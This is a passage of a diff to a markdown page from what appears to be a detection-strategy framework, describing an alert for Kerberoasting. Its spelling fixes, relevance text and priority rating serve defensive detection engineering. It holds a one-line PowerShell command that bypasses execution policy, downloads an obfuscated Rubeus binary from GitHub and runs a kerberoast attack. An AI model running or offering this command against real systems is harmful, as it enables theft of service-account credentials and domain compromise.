the2dl/alerting-detection-strategy-framework/Examples/kerberoasting_abuse.md

 %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe Set-ExecutionPolicy Bypass -scope Process -Force; %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri "https://github.com/Flangvik/ObfuscatedSharpCollection/raw/main/NetFramework_4.7_Any/Rubeus.exe._obf.exe" -OutFile "C:\ProgramData\Rubeus.exe"; C:\Windows\System32\cmd.exe /C C:\ProgramData\Rubeus.exe kerberoast
 ```
 # Relevance
-Althought many environments no logner have weak RC4 hashes to easily get roasted, it is still a good detection to have to cover this attack vector.
-It is one of the easiest ways to compromise an elevated priileged account and allow an attacker to pivot to domain compromise.
+Although many environments no longer have weak RC4 hashes to easily get roasted, it is still a good detection to have to cover this attack vector.
+It is one of the easiest ways to compromise an elevated privileged account and allow an attacker to pivot to domain compromise.

 # Priority
 If this detection can be tuned properly, the severity should be a Critical with a 100 risk score.